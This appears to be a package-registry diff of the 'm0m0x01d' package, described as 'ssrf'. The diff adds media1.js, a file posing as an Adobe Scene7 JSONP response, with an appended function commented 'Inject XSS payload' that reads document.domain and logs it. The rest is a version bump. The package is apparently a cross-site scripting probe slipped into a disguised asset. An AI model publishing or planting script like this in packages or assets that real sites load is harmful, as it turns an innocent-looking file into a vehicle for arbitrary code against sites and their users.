m0m0x01d 26.0.0 → 27.0.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/media1.js +13 -0
  2. package/package.json +1 -1
package/media1.js ADDED
@@ -0,0 +1,13 @@
1
+ /*jsonp*/
2
+ s7sdkJSONResponse({
3
+ "style": "Scene7SharedAssets/htmlviewerskins/css/html5_mixedMedia.css",
4
+ "type": "MixedMediaHTML5Mobile",
5
+ "vt": "MediaSetVirtual"
6
+ }, "192959476");
7
+
8
+ // Inject XSS payload after the JSONP function
9
+ (function() {
10
+ var xss_payload = document.domain;
11
+ console.log("XSS payload: " + xss_payload); // This will log the domain name to the console
12
+ })();
13
+
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "m0m0x01d",
3
- "version": "26.0.0",
3
+ "version": "27.0.0",
4
4
  "description": "ssrf",
5
5
  "main": "index.html",
6
6
  "scripts": {